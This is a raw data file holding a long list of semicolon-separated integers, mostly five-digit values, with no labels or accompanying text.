1396;43490;55330;21362;49343;22502;44301;53603;57480;33138;34056;62338;37333;33299;32536;56132;55662;49611;23005;44320;39006;26175;12977;38729;24874;32948;38379;48862;41525;12118;41888;24277;40054;52677;10491;65752;15858;48229;25800;37407;56397;12979;12457;34044;48216;45099;53538;33946;42742;37703;37932;31243;47248;65699;40212;13913;18772;56247;26992;29272;29329;28411;60410;57429;20602;53783;48461;26124;42739;59772;60512;63964;43417;14153;18532;14406;10555;24593;59547;14998;39517;49725;55190;23580;61119;46293;37504;64181;31037;54909;39472;18283;39455;47447;24252;43181;27812;21175;28463;31158;55110;60122;36003;53838;33165;39703;40482;63667;10019;64748;27135;57106;58514;60137;60299;30315;64692;25419;10923;58939;51452;18121;45739;36457;25344;12820;40298;45388;43652;37619;63415;66451;42080;58723;19163;26205;60568;55901;21510;63204;59025;38941;64994;21302;39618;54209;26893;16240;47050;63819;36281;36270;55680;32739;51802;20864;31230;21140;39001;23188;47439;32503;19824;11984;40849;60096;47272;47847;60287;31035;21555;49698;46745;35927;53559;54993;47584;57013;29167;38569;26919;63979;20257;44374;11779;27161;26469;16709;30576;48920;65853;30324;45134;22326;62345;20120;40194;52295;43713;58544;32618;34898;26811;52422;50432;22870;21727;37020;21032;26609;10860;54157;45847;21522;63092;26274;45330;32002;19273;19146;44571;47222;25296;46267;32590;54768;19410;42910;26848;24070;33927;36553;28782;12807;13976;18684;57039;42965;65702;41293;62306;30959;60080;59090;39988;48167;19460;32596;40939;30141;58783;40810;46357;12246;13032;16980;14085;29837;27723;35272;44778;10526;16624;55227;63538;41815;26778;12620;23348;43819;58347;38831;38710;65993;41680;30527;53880;55355;58265;18333;11588;31641;40911;66707;50568;53519;66920;28370;35364;22923;66603;41752;21365;18831;61521;12427;11506;14906;52865;46404;60263;60014;11518;27677;40257;32684;15427;31679;32492;32527;15417;39325;21966;61058;21154;55730;10833;61731;26335;31545;33871;48731;10119;10377;11667;39908;60786;45890;60397;52051;58200;66001;50308;10763;61330;14032;35396;47538;46002;49589;37521;49151;37668;15874;64458;61432;61527;30368;20914;52459;36216;63116;57606;62871;52262;40301;64020;47850;43172;57729;41696;64950;32116;66975;32849;37653;25011;53645;24254;45684;55710;43321;28819;51338;40050;50770;52272;51242;23950;53216;19255;18366;66558;51301;57036;49334;59148;26647;18205;42415;19618;23301;54013;54750;39441;63025;20785;38462;38628;51819;34308;60253;17670;65397;16377;22962;11395;11666;46028;37884;22691;49015;27137;37374;12690;46374;42125;29303;17300;29965;30294;53722;53752;20994;13091;38871;23923;39279;37569;13583;44806;49857;30495;36828;42947;13857;20504;56463;51518;66570;37903;51038;19260;56658;35289;26237;56963;41692;19891;46823;55074;22034;19785;41753;14444;56681;13579;16264;66774;47462;44238;13593;35806;53689;48225;61958;22769;39783;18961;42230;51903;66820;55909;15537;22803;41461;52506;41890;57176;52981;40092;47488;10450;49414;16821;25710;41993;31800;32332;34965;44338;52224;40788;24569;32738;40572;19790;34868;24686;66138;28506;64782;48551;41784;26490;46389;38849;40012;31295;54429;17587;15907;37447;18362;13689;43722;42110;49632;54271;58159;43666;12300;12858;42716;25791;61919;64254;35610;63249;13892;56150;32317;31863;33647;15112;53787;34353;44709;61178;63153;24007;35033;60297;38645;14063;37705;43159;39981;43166;47262;66357;18821;56206;58077;60657;36263;24627;62580;13278;17014;17789;57177;14073;54102;13747;39110;13447;46289;23700;58354;56670;24015;35455;46751;64208;61131;29591;40004;53019;21864;33136;20952;42860;46639;14158;24869;52626;30783;21082;17225;14363;48173;35388;21401;43454;28476;65183;47178;32873;20818;27803;54448;50061;16480;13016;25377;30253;51576;65055;38541;40237;66776;27295;42399;44765;60866;21855;37580;19148;29085;60013;19167;32976;46758;24954;63175;45105;42186;14374;52766;24967;40878;38074;56925;47624;36439;40462;39481;44513;59045;54742;12901;63923;45576;48516;10730;63773;50368;42518;56859;52408;18997;37097;27346;30800;18217;11440;20872;15554;56928;26683;31042;28406;17152;12864;44980;64768;41133;49961;29966;50042;29384;32013;14823;55248;21205;58071;22631;66339;33596;48601;29301;21834;51707;52953;22650;40631;46216;16909;16963;40655;30199;30390;43880;46164;43556;55636;51325;63876;46101;12338;45803;54879;49156;50753;40431;39444;53581;16329;49369;13379;27958;24304;56187;65480;11478;50730;11088;63856;65435;64529;27876;54033;25360;46330;35912;40725;39055;34561;45864;62538;17773;30035;44346;34974;35505;42676;65442;29430;21269;52245;54110;64402;36143;35139;54494;32568;42016;44126;13560;44817;50083;48246;11418;39778;35908;24422;15976;48953;36318;40369;17038;20210;58748;42550;48460;25398;30609;28499;37533;27595;60529;41069;24291;46465;37133;39071;15760;64882;37881;56893;20680;53638;37345;32517;32040;25341;64393;34944;59493;34148;52236;56944;25855;21904;45335;44160;55663;18507;38081;55044;24908;56609;35319;56448;29975;14278;39235;27956;64493;55315;47821;40873;10800;47588;50561;59135;17486;62748;15540;17294;16532;63971;16747;37818;63451;62412;29797;38596;30300;27588;61885;21291;20481;26450;10437;57812;52081;31514;51935;11125;60694;39391;42322;54155;64889;28561;42535;38883;52785;60859;58446;44642;30934;47867;34479;14992;55945;23731;34206;66476;47214;30695;20013;20606;31128;62713;46043;32204;19570;63970;16449;10989;62534;53774;41810;60942;61583;18329;24012;50782;52252;51255;17566;35423;41062;52946;63230;44768;21894;51098;42032;21128;54267;45011;44294;63155;66271;34046;11724;61171;21594;16840;45468;18437;33090;26607;46300;65108;62285;52889;26702;13326;25817;63683;63992;39122;53924;24507;29054;44866;16294;60985;63085;25578;21649;46411;55546;62511;10412;25015;33499;24319;46707;11646;60983;32066;44760;10369;48543;34518;40952;61514;61313;66596;28783;45537;48905;66908;61324;57709;45586;58688;53521;55776;65441;29199;62118;36133;65068;16077;22891;31263;61001;58096;30301;36883;44391;38278;66044;19062;19676;66017;60778;27506;59062;53486;16378;49637;24791;52832;49383;21940;18745;39398;56528;31027;15239;44716;31028;28593;18729;15800;59343;41921;43989;41954;35314;41345;62482;23346;42424;22235;53602;20204;34912;56037;64009;37456;10846;15595;20479;30409;58419;62552;21228;18166;12097;54180;17645;44795;16393;43083;24757;36860;49554;52791;54673;12205;16201;61492;16403;11212;17278;56688;61721;27541;49182;54153;62984;40366;20951;12589;15419;63508;61735;62610;24800;44531;58006;62563;33265;11331;36840;56425;35966;51918;49865;38275;15664;13875;41192;51383;62353;33515;42134;11154;29891;46324;45682;45165;53093;58282;51758;64648;24544;38242;35574;51535;24664;17737;40198;15020;20341;27654;12601;58327;17044;59918;37273;47826;16870;17736;64248;33850;59108;17707;38606;44610;66372;30329;46020;29293;31838;21006;38518;34927;35125;19385;59298;17117;18330;15271;31464;26215;10689;53888;50275;65628;17177;43790;56191;36248;18865;49987;24234;33935;20617;50462;57828;46669;23032;46047;65761;26379;15149;32858;36479;52353;58010;42520;39881;45049;65128;56697;51976;21664;25858;13337;61666;18843;21516;21906;44772;66130;61678;65857;43933;11431;30631;64743;34593;22404;64012;16873;15340;42657;13562;58712;53904;25932;48725;65969;44554;13978;14460;55700;12728;52250;33643;64073;38814;14101;53429;50694;36131;38690;18679;25229;62819;56212;59555;33821;32016;27334;15986;62938;22208;40464;26472;61499;57226;28359;31047;40090;17309;44796;55618;66336;23293;28212;30658;63120;62879;52418;22576;13484;35242;62430;59456;33206;13844;48467;53881;35132;12598;65093;64490;46996;47088;29302;57344;20883;12058;11848;22177;51399;55762;21561;25258;54419;18687;63889;58860;41990;42143;35775;54011;35897;51831;42139;60510;50740;63624;28123;34776;16710;44700;18319;13554;50499;53892;51184;64903;16847;15602;65789;14423;24810;22426;44086;56303;34087;39012;28658;66676;42034;44543;23561;28303;57054;53510;35058;27098;60869;37797;42035;16735;41152;51893;37226;53981;40970;50246;41559;52852;51654;17441;40038;20470;43380;10017;45622;62230;44360;42978;35787;43565;13024;50945;36209;58819;29357;41341;64124;36750;56708;27223;59828;53303;17236;47856;11348;13352;40323;47253;56000;22618;10568;66313;35920;20305;52487;39495;38053;30194;55503;59666;24297;36370;62495;53928;62981;62354;56048;26361;66658;47081;24224;36827;19264;21170;10316;47499;65738;40641;59504;15093;14233;39175;51231;54228;46451;29408;46622;19581;15997;19975;42296;44898;30216;14049;66273;33735;37566;64909;54480;14188;32483;65590;64722;66427;46913;19050;32514;28903;23262;18563;55062;12576;10935;38922;55484;55386;27475;12209;47770;66431;29170;48439;58300;54595;34752;62681;18314;62704;38522;48451;18587;39940;52679;42537;54851;40513;19806;48774;20515;60026;51020;24849;10580;66910;34137;57174;49381;19593;57919;28442;30010;50241;47710;10823;16607;35692;45257;46228;50127;23970;18370;32444;64877;20974;53013;30545;47647;22306;19092;37923;49624;43680;41830;59640;62378;30340;66831;20489;65905;42824;14913;35305;22935;15902;20402;60413;36624;30064;62890;60978;27885;56001;34653;58751;57451;38094;17813;52509;11602;62643;14718;35149;48951;20505;12034;25345;51155;43503;53958;62882;31453;20507;54867;61724;36309;44417;35534;29321;16431;12346;18971;34999;34038;65912;53120;24362;51739;36364;25701;13332;33015;66563;46834;21264;64932;58191;20935;45365;47580;28659;27002;26942;41001;21605;51617;14579;54783;41819;17787;49158;60199;63535;56122;28446;14963;52208;26466;33689;43177;38540;58998;13548;11686;33278;55172;49605;48650;50647;48466;46985;37901;58317;34089;51199;57896;24219;22412;44197;28901;57795;64908;55356;59323;53068;63623;38579;40763;22301;62815;66315;56359;12432;16486;59820;40735;65338;15796;56165;60024;53059;31269;60893;14686;37855;33505;52075;43395;62775;18018;66046;21492;44450;54641;27526;29238;43127;49817;24805;51354;42261;29844;29795;12863;12055;44378;44365;58231;60305;12695;41306;35681;61224;29405;14274;38281;54412;61846;24701;22076;22508;61464;15433;66882;27781;35917;18282;19887;64165;61461;62540;23928;49079;20241;26736;66503;63258;62682;44880;35669;25934;27148;58801;35170;46798;26485;38101;24283;60615;60061;22705;43810;35903;64628;24078;63841;35096;20758;50296;41541;37058;52255;47737;51523;41199;34584;64867;32429;52521;46993;30167;61389;49106;58548;23326;61667;57596;57764;14288;39598;42542;30184;32059;64469;25002;44228;52281;28492;33082;15127;61063;21120;26161;37142;42171;45230;17247;18833;14594;48154;50194;65966;53457;15231;52697;64627;51904;28390;21724;15350;35604;23919;30426;16568;26217;18695;10428;20043;19552;45764;24629;11636;60952;33652;29352;32280;11765;54282;58518;64264;23777;64726;34153;27127;43140;24804;18228;58648;10431;20431;11070;55457;55015;42095;35576;56738;42058;33154;64161;26789;39034;37306;39543;49726;18812;57305;47450;62800;19230;22117;10675;12581;34302;21691;54072;38148;18720;28569;21733;20757;14968;35683;63447;62910;61700;33846;37821;27522;14135;38877;54314;57281;12726;11392;62501;36405;33213;36579;50287;12336;10514;66009;45605;65779;32036;28583;54633;31108;25530;52582;36557;38681;49784;39388;12089;48416;56659;25400;43224;46052;30094;44847;43699;26377;28288;64865;65583;16858;41930;30287;18050;12855;37574;46600;27124;32553;42994;44696;28991;54475;45100;28851;20002;32795;63032;33645;29091;65630;42464;63039;31557;33604;53643;53781;27935;62277;11857;66029;42689;47568;13107;50926;45582;18873;28447;43019;64233;36358;64305;19002;33936;29612;53400;52958;55525;58642;60606;52157;59709;62154;21911;14541;56373;43766;12383;21430;38811;23707;23876;65047;58803;64863;47210;15121;40799;19740;53089;62760;10464;12527;61242;31438;14397;52364;34911;51466;10118;22844;26439;41543;33349;26451;13401;25594;31372;14751;18784;51645;44096;25526;50562;22127;38897;45223;33268;36265;66487;45166;13477;45650;18940;21944;27583;53293;66957;20925;18382;61782;45208;66677;24013;32735;50279;18775;56384;30699;49888;47244;56920;62855;28061;47676;63808;43602;10360;33440;30262;46162;42220;17251;64509;57998;40856;38762;53144;23403;63217;14851;22488;45448;11248;38376;24796;27765;39465;30807;30839;63671;24558;13516;39576;33623;62657;61089;46061;37342;36490;64737;24682;61924;63016;63394;50333;22743;13179;18019;28566;22965;58753;57019;52333;38869;28575;38820;23562;19639;28617;37127;35954;14413;52719;50683;21633;26460;47535;31050;41052;37207;48455;55537;12828;24879;61095;20876;42650;65530;10481;62721;53866;42971;55055;11885;46799;54823;19615;26642;59074;28090;14907;21177;29841;45189;49013;16590;37431;24464;45599;13711;16284;41368;61998;44563;40402;50795;34128;58935;25205;62105;35283;27118;31500;55251;38184;44788;41011;57446;59804;40835;34699;12688;33769;52480;21748;47669;29668;61027;18603;28725;27705;22601;12023;55147;48274;14330;25294;57749;21200;11408;66232;30375;17202;29336;39422;33548;19748;53141;33180;52777;39980;41443;41506;54612;12225;57277;29105;45104;10926;49839;34326;22903;39111;11889;27644;29666;52478;52147;14749;18966;41208;47187;42908;20918;40260;41139;36513;53696;48210;55523;53335;64153;23020;27140;49078;63720;58690;56459;14212;21699;17505;35687;26839;51253;29631;36849;30824;41765;31756;44965;41508;41606;62418;27838;22059;56798;27087;54686;10934;26976;42407;52168;44376;29703;32572;62374;33058;40596;21261;40243;51992;46679;28354;30032;64690;16653;34840;31750;63263;32489;53337;59032;17021;40547;27111;52235;16530;23327;58288;64062;37776;43424;27611;39606;32210;27159;49404;54697;38311;53234;65282;45406;23718;65019;36039;13312;25302;28271;64543;43572;43787;54080;29143;40443;55647;30153;15698;36240;25414;33179;33481;14799;48436;36110;57856;66106;24018;41932;62739;60767;36902;52618;29674;56594;23872;41677;51997;23310;20686;59371;39722;28879;49783;40381;31474;33010;15090;51479;24092;26359;23263;27167;39663;33016;66848;52554;56108;59932;32414;40853;27903;10682;20227;34327;39142;15411;13039;38699;30639;53401;56177;33150;61526;58264;65227;57960;42801;23960;23484;63523;24588;62647;13838;15357;27659;16373;37960;26347;14855;10942;12714;15980;50701;35623;45446;61302;14041;65689;19623;41337;52016;25440;30817;35771;22761;65594;31513;36261;22929;40734;36645;17996;52204;50964;63345;30710;53836;38706;30482;60236;30121;50124;28681;33863;49376;31741;13452;62693;20719;38725;22009;42682;49190;57468;51693;40423;52331;48488;30092;16941;18216;64847;31671;15873;51784;39614;60023;55510;34246;39214;65415;35672;13830;12902;49981;46007;16603;27180;56566;35466;28933;52358;49798;52363;48284;17831;42923;55559;52901;64911;25392;28610;66694;36127;17290;11215;63275;35750;61141;35118;64542;35419;12408;61772;47699;18237;43665;21618;30612;55963;40760;63198;28719;37867;39955;48168;53726;30787;47266;62515;65996;37698;32236;53447;30446;62842;19112;25110;53434;60403;50165;52906;16252;28891;30283;24942;23728;26718;61675;46965;34646;23639;29987;26960;58626;49087;22838;57954;25582;48801;51272;63550;52282;61909;25180;42367;61906;10796;21854;25619;51827;35632;17435;47674;28733;11324;57211;53987;52805;30366;10083;50808;13486;16309;37394;54987;30790;44560;43047;55851;20418;44518;65974;10943;12518;47161;49996;49585;51133;28606;25990;26785;13382;21265;17781;24723;58814;18169;32183;28649;57098;41723;18944;20644;31859;43963;42017;36974;39125;13409;54067;64171;31076;29587;19245;56066;49859;38350;57986;48632;59717;50077;48934;36684;16345;59835;50235;53106;23513;31167;64638;22337;39579;63548;29513;37554;17423;51616;65389;32388;25904;63157;53666;12942;41948;18781;39308;22419;45436;20119;36780;34017;47350;27019;36506;38776;44329;62215;59815;32155;27964;16721;24085;20916;54418;61656;26297;64674;53489;36967;14666;47413;56375;34320;18555;34294;65823;13434;28608;55602;44000;19996;50638;60367;18805;13650;64361;63993;55244;36121;26599;38095;50825;20767;22221;56424;59335;64227;41015;49293;49994;58726;13272;36507;40135;41190;27897;47815;57939;54057;22686;50335;29732;24775;30767;40872;24166;14770;17520;49464;53338;51410;31141;32571;49819;41298;36766;22340;29368;14377;49402;19791;51002;49971;45056;56321;54623;57573;58114;15434;19955;35852;19590;17998;28115;13192;54941;61003;14622;29222;53229;20732;46946;53104;58173;24721;37183;21131;43530;12953;46586;12219;26541;47351;35025;38297;63018;44142;55292;38630;58634;26480;17402;36205;45736;38730;41484;35880;19390;63996;40253;45833;21985;28555;29264;27511;49490;35556;43084;32733;33875;52392;15208;37721;61604;23154;65085;53929;60183;46029;20838;29988;33530;20380;41177;58822;10761;37023;31813;42523;29134;13429;30704;44354;41521;16000;13979;54105;49033;12350;43485;10469;55270;62330;33187;55165;62059;34068;56969;51680;60581;61103;51752;34755;53993;28777;41964;39535;38848;16679;35685;59755;19577;28534;18238;34383;55654;45130;13536;38471;28568;63860;13889;41002;46633;11334;25036;19681;62213;39503;38745;65720;60650;47394;12647;60925;16984;63594;55783;61112;53230;42024;37099;55161;38832;34482;18013;51730;46540;31610;16134;24232;64937;64771;29586;41779;22178;39097;13373;13283;16600;34014;35449;32181;15670;29949;58673;64976;28216;28523;34124;14084;40559;22423;41428;25483;52748;37850;18962;15758;49746;38549;17742;57217;55678;63687;27136;42476;33940;17741;36359;14634;29097;52526;15375;19099;11685;30314;28570;15025;21176;27375;54692;11347;62712;15848;36618;58543;50406;12885;14888;58569;51256;35566;10847;31278;18365;33789;42572;53153;45264;17819;59035;14287;54998;20359;32440;49086;31256;18877;45143;58043;22598;17301;62089;63375;40353;63358;16281;15074;32041;55368;20704;52636;14592;22319;55716;53287;22794;26802;51117;21545;17603;12799;64741;41388;29778;34622;66146;45198;24050;23879;51128;29361;34638;38711;64667;15924;44804;29284;28683;62101;54870;36251;27732;60398;27678;39534;46697;32047;58802;38020;37686;63960;29457;55632;24345;27508;50171;53824;54902;10565;12355;64459;26231;64421;35769;20289;10380;66632;64951;17293;60288;57821;54890;64059;60148;54963;27874;37426;17658;51470;47174;11110;63163;60794;53060;24827;28582;66550;15182;21647;49666;41294;60518;12049;27054;34745;62750;18658;64551;34855;34808;29118;66886;37349;35249;11756;37152;34715;41019;33561;65488;18660;39747;58221;58951;22801;55653;40515;52015;58171;56818;51134;64553;45155;51570;31943;66096;57953;23093;60074;47544;66674;11847;64082;25469;36790;32909;33322;51065;19280;17013;11383;44214;12431;57551;61167;51443;19500;27222;29680;10644;22093;65971;34016;26812;23023;49115;53833;25845;40352;26158;18930;25017;56741;28272;63299;19363;17723;34826;61790;25962;10632;33666;57744;62874;57642;18920;46042;25623;32575;18257;50881;19141;34687;22344;39919;20447;12742;26362;34120;58875;37515;63214;31190;15571;40459;58185;50473;23990;26742;44213;38923;16836;46032;13197;23890;15823;12524;41653;12498;11515;47217;64823;39080;28992;52813;63352;28186;31760;51818;18769;29191;64188;28057;46655;15739;64907;58140;49871;41769;61743;52794;20776;12384;34287;36049;34922;65596;16828;22415;60022;29456;66880;31121;26247;62274;28924;20911;36095;11593;65586;38042;20098;52095;49097;35069;32834;48573;64089;65078;36670;26872;19963;13492;17634;13028;17533;30691;22585;48631;43028;29261;42079;34116;35972;30584;17173;24251;63271;25602;37415;43469;31449;49718;42310;38254;15234;35065;53630;38818;38939;64538;21099;35478;36029;46589;13702;23237;30615;51629;56800;42149;61045;59455;11487;10538;52423;40852;29310;16488;41793;40234;13658;14456;64831;23089;26879;14068;46428;35661;41909;52761;45592;53943;64021;11603;51126;33782;13903;44736;45493;50482;54074;11743;36796;24417;54251;20636;64830;28317;34800;65411;28469;37093;55336;51874;17415;29210;52917;57183;14867;38846;16544;15438;54202;48812;45124;19514;39611;53813;63807;30361;12341;66419;34354;32956;11107;43808;57760;47199;22285;60668;23530;44371;40430;57771;13322;20222;25411;57457;12859;39784;44097;56464;49213;33962;52824;14927;43900;45748;42496;48345;47884;14605;15927;30478;50979;37068;36656;28495;65726;27842;61438;14556;33984;61531;19345;31904;34109;19606;26312;34514;33503;41353;37000;18822;12362;56443;14580;29725;41652;58517;25220;46506;12600;36163;59737;33401;32327;41376;21694;38552;56840;29994;31222;40060;29796;49128;11769;52013;23309;37318;57711;62722;41194;30682;52088;59236;51019;32621;59461;26984;52159;24437;29465;45019;58738;38787;51956;45322;29295;52239;63646;48910;17428;20737;51366;33148;44547;44467;34368;61927;34536;20584;43570;59707;45387;38189;42556;21136;31678;14410;26352;25069;22624;28375;16837;54358;65757;16054;65983;11161;15409;66438;56677;60175;20825;31490;26125;55408;17541;55921;25188;61099;56152;21916;16169;19462;29338;43568;42876;32541;26151;14902;40534;48847;40663;19550;43491;57236;16969;66624;39627;40472;56885;43320;19485;66360;27847;27709;46046;60466;50905;37403;24717;56672;41138;49349;56526;62907;53382;27604;58895;33910;26969;12660;51828;40350;53834;15486;25951;50233;46294;54408;31386;42747;24990;10802;15512;12803;46265;32237;52400;32937;26427;29879;26331;60550;28395;19921;59805;12426;51732;53897;20707;40276;45487;58459;50426;66830;17413;65461;57292;52237;41861;23045;49361;37600;61248;66763;42532;21951;31696;61816;13902;13859;26583;61071;60215;38372;23417;48819;53591;37123;23785;17841;36400;21721;13771;41413;13954;63989;31130;31632;31139;13855;45655;57269;65945;50388;21035;57808;35790;41197;18592;23299;27397;57358;62062;62547;55341;31277;34742;24117;29427;30488;62578;48249;55854;20261;44474;13782;46966;16339;42564;35001;43558;19667;66421;34698;44029;32576;54679;54354;40314;18413;51878;22004;17318;41127;46333;56790;26999;33500;53847;15075;57546;45025;49775;28544;32866;47717;26686;10936;42454;44033;50125;20854;60762;42444;50999;35447;20544;42039;43584;47155;13786;63274;27792;36034;23630;10282;34603;63424;42300;26582;20476;49109;53264;33387;35522;36328;39974;22143;66386;61986;26182;32669;44283;21110;49083;44289;48266;50879;33598;48933;51630;45648;48806;48813;45065;53660;11821;41982;58086;22438;42456;18318;50796;35218;32305;14772;50587;41727;11213;45286;24412;66074;30730;13897;14168;11457;18591;44645;63506;11737;36421;22291;65637;63017;37969;37839;35507;11006;21688;42544;56621;61522;21745;54675;43449;63565;37396;57166;26961;44347;16802;44919;61746;26105;18111;54883;47412;16869;44789;34335;56614;24987;65673;64050;38428;66879;24137;12663;48935;29712;32867;26905;19305;44420;62889;14636;41735;45342;52833;48779;10969;57842;13230;35044;55309;46695;51993;22831;39199;23194;63545;30011;15652;64804;53297;23479;15814;39067;42217;17981;42906;34403;60381;17982;49200;29542;25639;43026;39754;49179;14637;36027;48404;25599;15622;20749;13939;27688;16734;61630;22725;57350;24919;14295;43598;55864;57863;48198;18174;22315;20408;47877;15663;32174;49845;59277;26011;23629;13519;45039;43324;26710;16368;56639;20956;47327;36981;27839;13809;26142;37809;12849;14498;33051;10652;20503;25672;53405;12295;64763;62020;25291;55327;40168;54704;29941;62019;56006;54329;54533;46657;39607;37906;44060;64817;33008;62473;32191;17461;42435;31220;45846;45044;36549;44733;34393;20513;20551;34022;24426;22952;33941;55139;22146;30927;22795;16013;20438;48747;66963;64698;25658;57092;42274;16338;34762;14982;63574;37822;56054;49603;18530;24333;34793;55949;64814;57445;17162;52642;33786;62950;52949;17655;49423;39457;46144;24843;13927;21256;25150;16490;64360;17091;63920;61561;63338;54068;23654;50447;41806;29874;35091;33497;53414;40379;62491;32936;22085;43222;36508;59973;55670;46133;52709;53588;13108;45758;51036;63690;59857;61633;65658;61190;43444;31163;11738;35558;16400;65046;43939;11536;42732;65264;15000;25289;33248;64431;26397;51807;45640;55433;18730;60469;12525;30069;30279;51471;54236;48155;21192;32158;57073;49934;51808;20183;42247;40385;65512;57454;26874;31002;13706;47438;21143;49143;12821;36219;64866;43381;22022;14039;27833;14320;12207;13074;59983;34816;59948;36030;46978;33906;62099;32885;29688;27078;53273;15918;51407;32907;56013;26303;13405;32124;16184;18748;54527;22175;64634;45451;43115;62175;46635;53575;43208;60150;48247;32152;10269;65026;32554;15487;46779;23912;27798;66739;16944;14934;49284;55138;38453;10539;30852;64378;42548;45010;55586;22042;55440;14341;49227;25748;54014;23738;27593;12897;17762;20094;31240;61893;13052;41285;15569;29517;48737;28033;13471;18201;22071;65687;20012;13549;49598;59005;13202;38964;25293;65053;66615;66562;51120;10461;25274;41934;30842;28977;16901;15517;46322;19588;53887;39018;16236;62058;58532;39914;20497;39741;20830;27778;65587;60271;58094;57586;49937;20364;19884;46026;57993;16079;56173;10653;43241;57616;36225;51330;66859;54541;25033;19306;26089;55276;62199;63926;64800;39121;32320;30907;49948;40841;47193;28121;31996;17311;15307;61805;25319;16745;22766;28218;50535;49777;36628;61297;40647;47396;43988;29496;33458;16881;46023;63459;64200;65245;56322;24460;51297;39716;40983;31728;57319;64262;20448;20181;29801;15281;40884;40416;42733;48795;43133;21416;57784;58652;53631;63340;23296;35898;22316;34921;21247;13712;28344;44514;57981;62825;64547;26540;45478;40053;60903;53714;29878;10199;60769;64222;42226;30166;36675;30071;29469;30660;54370;48599;53782;41614;53646;35424;30441;51519;64104;55994;19153;27598;32144;26989;55488;51769;65532;46637;17786;55411;31995;63285;18435;62696;35482;48476;56129;61301;50206;15964;58274;27814;17083;50487;15177;58055;62006;32713;62838;45018;30701;61758;26368;43801;24920;42073;59977;46141;13331;10444;60451;58553;43124;46971;61053;45102;15830;58664;10546;51472;65960;63830;57647;31554;23460;43712;10552;51949;60896;59687;22648;40061;33897;15952;28763;32607;15332;30626;37450;66509;13374;12961;24884;39400;33580;61753;48639;45822;27891;25347;62014;34465;34362;25787;29381;60365;40152;59731;49085;43609;11082;64406;59365;19712;39775;61887;13142;63001;54724;26733;34734;60763;28768;23432;55093;25997;33436;62063;10575;56727;63616;42376;60569;48667;56518;32230;22752;64968;47681;24988;15286;15524;13664;23571;31669;10981;23207;20439;23227;20393;52615;16180;30476;42944;49001;61227;51765;47906;28987;45564;40941;10111;53632;66409;21830;50466;44459;61320;42074;43407;28884;23240;59952;55810;62811;24614;38173;17111;54045;34151;30503;30885;61024;32267;22123;39983;11180;43265;13065;61060;57006;17595;30302;52071;26684;37989;15219;60720;45456;65536;10457;11747;39277;50039;51294;57141;58980;62052;54128;40397;45630;23868;14878;40623;55121;51713;27976;14999;61399;56756;51530;23314;56964;24910;32742;63689;49515;39737;14539;48231;47823;19852;20712;64787;48738;53738;45533;52875;55499;27550;54531;39158;26827;57890;11364;31714;52310;38363;58151;53475;38257;57070;62455;33185;16863;50807;65810;15756;30155;60217;25005;29740;27675;21478;24130;12303;62782;35892;59370;24970;52181;30328;44448;61547;15358;12646;22874;66900;56089;21783;11615;24284;45256;11229;20486;26314;57205;13442;18554;50190;49892;61057;31291;65773;59330;51014;53030;16095;25277;29630;59635;64546;52749;34472;66054;20771;44204;18674;47108;49447;38564;61637;59513;42293;64255;60705;18021;40838;60302;11367;58914;51699;14848;14369;27528;12406;42202;15637;57077;62415;56172;54094;40437;51475;45106;56595;17675;14896;21920;63482;65121;66657;53259;21454;53460;44852;63054;25284;34663;44900;60564;58777;27813;38444;43635;54703;10272;57507;10912;58955;34274;22210;21517;23898;59257;24956;43223;14272;52633;58225;30735;24979;60560;54476;47334;47739;14891;59026;61725;10135;59654;26258;61546;22628;65048;64967;46626;60573;44305;26491;18011;30998;19700;52657;21081;60629;45792;10146;64609;56901;23102;35916;18845;28480;14119;26544;33298;23368;58109;55605;18184;43169;22139;56398;27564;44286;12989;25876;18487;40676;64580;52335;63963;25394;55372;13280;28825;14536;62104;11326;28039;45929;37757;49713;48956;21684;16706;55827;16637;38513;25138;64975;47094;27174;66341;24366;19986;31829;27480;19226;49644;33734;48699;35099;65280;21820;11309;18399;25945;23283;62924;19543;37136;57547;53366;26152;24606;29209;39180;50017;15669;40803;12016;15546;46353;16500;43992;64435;10353;38210;32776;66799;38873;12398;49918;57310;14793;18452;39127;34706;38697;40564;15718;65841;12071;37289;40573;36324;30960;40731;39875;27726;40789;59606;57272;18271;54122;62669;44580;26270;39990;15797;42166;46260;51378;18502;66884;66849;53907;26454;19716;15229;57093;16189;17395;58809;31018;44469;28930;32831;41926;28119;22089;50418;59396;55677;34404;36189;62785;18923;63540;64189;42153;16285;30134;54005;61661;52050;14993;14022;66176;35271;24483;57303;32033;36702;31876;13566;42590;13912;39213;32999;52787;33781;13058;39546;66853;52349;25279;24705;29931;58259;55910;49537;57995;47769;31868;25094;31616;17639;24076;12388;16515;16307;51817;25486;32793;37449;10622;55583;42165;58520;30895;19311;51984;29328;19668;34658;22668;66109;18496;33762;62694;16379;15073;32239;62341;24498;27807;13185;50284;27144;39782;50766;57133;39159;58576;22424;61538;21399;25860;51924;36990;40055;11678;22645;11001;51108;10838;27345;27428;22644;21900;64836;35402;66422;19132;18369;55646;35342;47060;50112;63316;16556;14271;59682;34176;57657;47695;56850;57274;31960;20746;10171;39928;30769;14053;60496;14850;62408;48332;63768;12910;51078;17046;48930;51906;34055;33807;28050;15301;35976;47332;33389;62840;29022;44487;27420;19951;54736;14940;26085;13569;37393;48340;11676;55219;13870;19301;28067;54849;21556;45485;47793;16290;60239;11555;64970;52143;33665;42864;52393;25020;17784;64307;41549;43587;40516;45855;10421;48979;27990;30175;53394;58268;32870;32045;53937;22925;13721;58597;57186;66500;19078;52006;47480;41758;23349;28094;18559;56127;36001;38659;42087;62520;14261;28505;23230;57251;20496;34193;36006;56125;47516;41153;11341;63117;11671;53917;47036;30008;59588;16705;47805;36514;43342;66392;43643;42768;18038;23521;56888;54606;23913;56193;58066;60554;48171;63317;27027;10223;29426;19296;50094;20090;57984;54195;13922;13304;43805;63786;53585;61691;33841;39252;51311;65104;33985;57561;43672;15006;19624;27348;11935;39773;51618;58934;19369;33926;66871;55422;30729;60141;25265;12088;15727;43539;63273;52580;61508;63998;54477;19959;60354;48223;12654;52708;37189;50717;40928;52503;43440;30749;62718;39191;51597;55243;37477;21929;25203;19097;12521;18689;66197;23186;21848;41454;50013;19013;59130;51091;15012;19053;42791;60960;53687;38144;39751;63630;37830;11742;29204;42508;11427;23790;51496;29766;27650;10807;59093;55870;26952;66450;34123;56842;62424;60213;60664;56731;58537;14965;51898;35311;29820;28574;60294;61582;19509;33711;53404;32680;40635;42591;48538;40317;21740;60583;22240;10271;56748;17317;39039;18465;63422;26705;10929;16835;42245;40130;23930;19059;13718;34196;49399;38854;21232;41162;54321;29726;39176;11951;56094;16074;53737;54626;59639;50214;15135;40182;34268;61973;42819;21045;19954;33737;59122;66891;56400;14852;53004;38464;29159;60961;64590;57386;34129;10885;66591;59029;32225;64174;37612;40826;61705;55458;55297;